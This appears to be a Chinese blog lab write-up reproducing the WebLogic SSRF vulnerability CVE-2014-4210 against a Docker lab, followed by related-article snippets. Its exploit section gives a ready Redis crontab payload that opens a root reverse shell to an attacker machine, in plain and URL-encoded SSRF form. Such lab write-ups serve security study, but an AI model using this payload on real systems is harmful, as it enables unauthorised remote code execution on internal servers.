【SSRF 漏洞(CVE-2014-4210)】

最新推荐文章于 2024-04-24 09:42:31 发布
最新推荐文章于 2024-04-24 09:42:31 发布
阅读量595 收藏 11
点赞数 4
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyyyyy123/article/details/136519444
版权

文章目录

漏洞简介

SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造请求,从而让服务端发起请求的一种安全漏洞。它将一个可以发起网络请求的服务当作跳板来攻击其他内部服务。SSRF的攻击目标一般是与外部隔离的内网资源。

一、环境搭建

在ip为192.168.11.135的centos7的虚拟机上启动容器
在这里插入图片描述可以看到,同时存在weblogic和redis的服务,而本篇漏洞的利用方式就是通过weblogic所存在的ssrf漏洞来访问内网中另一个redis服务。
通过 docker ps命令查看所部署的容器id
在这里插入图片描述
可以看到redis所在服务器的容器id为 b694c0065649,通过命令 docker exec -it b694c0065649 ifconfig 来查看redis服务器对应的内网ip为172.20.0.2
在这里插入图片描述

二、漏洞分析

访问以下地址,并通过bp抓包
http://192.168.11.135:7001/uddiexplorer/SearchPublicRegistries.jsp
在这里插入图片描述在bp抓到的包中,将operator参数中的url修改为redis对应服务器的相应端口即http://172.20.0.2:6379
在这里插入图片描述在回应包中看到提示,收到了来自对应url的回应
在这里插入图片描述当输入错误的ip地址时,回应包如下显示。说明可以通过修改operator参数的post请求来访问内网ip。即存在着SSRF漏洞。
在这里插入图片描述

三 、漏洞利用

准备好payload

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.11.128/7777 0>&1' \n\n\n\n"  
//crontab表达式,为linux上的定时任务,用于反弹shell
config set dir /etc/
config set dbfilename crontab//保存到相应的文件以执行该命令
save

转换成url编码,同时根据redis协议换行符是/r/n,也就是%0D%0A,编码后的payload为:

http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0Alalala

在ip地址为192.168.11.128的kali机器上做好监听
在这里插入图片描述

bp抓包后,更改operator参数
在这里插入图片描述同时可以看到,回应包中,命令格式正确。
在这里插入图片描述在kali机上可以看到已经连上了7777端口

在这里插入图片描述

cyyyyy123
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Weblogic SSRF漏洞CVE-2014-4210
weixin_39664643的博客
01-25 1121
利用范围 版本10.0.2,10.3.6 原理 Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。 利用 漏洞靶场 编译及启动测试环境 docker-compose build docker-compose up -d 访问http
CVE-2021-26855
03-12
我已经在为中国读者翻译了中文漏洞利用程序,对于不熟悉golang的人,请看png图片
CVE-2021-26855:代理登录链SSRF(CVE-2021-26855)的PoC由testanull写入文件,由github审查
03-12
CVE-2021-26855 代理登录链SSRF(CVE-2021-26855)的PoC由testanull写入文件,由github审查 为什么github会删除此漏洞利用程序,因为它违反了可接受的使用策略-但是其他许多概念验证漏洞利用和框架都可以吗? 是因为Github由Microsoft拥有吗? 审查漏洞利用程序对于安全性是有害的,即使单个漏洞利用程序有时可能会使应该已经修复其系统的公司面临风险。 Github提出了一个错误的优先级。
web渗透】SSRF漏洞超详细讲解
最新发布
zz12345600354的博客
04-24 1031
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。
CVE-2014-4210 weblogic SSRF漏洞
nex1less的博客
10-21 514
0x01 漏洞地址 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 0x02 漏洞验证 1.访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。 2.
[Vulhub] Weblogic SSRF 漏洞CVE-2014-4210
weixin_45605352的博客
07-21 5370
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
weblogic ssrf漏洞[CVE-2014-4210]
qq_43936524的博客
06-18 1053
文章目录vulhub复现环境搭建 vulhub复现 # 启动 cd vulhub/weblogic/ssrf/ docker-compose up -d # 开启了一个weblogic和redis环境 kit@VM-0-12-ubuntu:~/vulhub/weblogic/ssrf$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS P
weblogic CVE-2014-4210 SSRF漏洞
ChenD的学习笔记
05-22 1275
然后直接VPS拉取vulhub的镜像出现连接不到反弹shell的问题(但是成功写入了,其实也算完成实验了),最后本地搞出来啦,结果没有ssh,猛男哭泣!redis可能存在未授权访问漏洞,同时redis默认是不对外开放的,意思就是说只有内网可以访问redis服务器,外网访问不到,这时候就体现出了SSRF请求伪造漏洞的作用。然后kali也出问题了,docker拉取的vulhub拉取的weblogic/ssrf 镜像,启动后只启动了weblogic,redis起不来,很怪异。
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-26855:CVE-2021-26855 exp
03-08
CVE-2021-26855 CVE-2021-26855 ssrf简单利用golang练习影响版本Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7利用条件该突破性常规的交换漏洞,此突破并没有一个可登录...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
(CVE-2014-4210) Weblogic SSRF漏洞
CNXBDSa的博客
09-02 370
近期接触到了SSRF的漏洞,就进行了一下本地的复现,利用Vulhub的进行复现,别问,问就是方便,直接docker一键启动,这感觉酸爽! SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据
漏洞复现CVE-2014-4210(Weblogic ssrf)
deginner2的博客
07-28 1126
Weblogic 漏洞复现
Weblogic SSRF漏洞(CVE-2014-4210)
墨鱼菜鸡
05-03 86
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:...
Weblogic_SSRF漏洞_CVE-2014-4210(未完待续)
simonnews的博客
05-25 867
Weblogic_SSRF漏洞_CVE-2014-42101 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他 1 漏洞概述 1.1 基础知识 什么是SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 1.2 漏洞
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值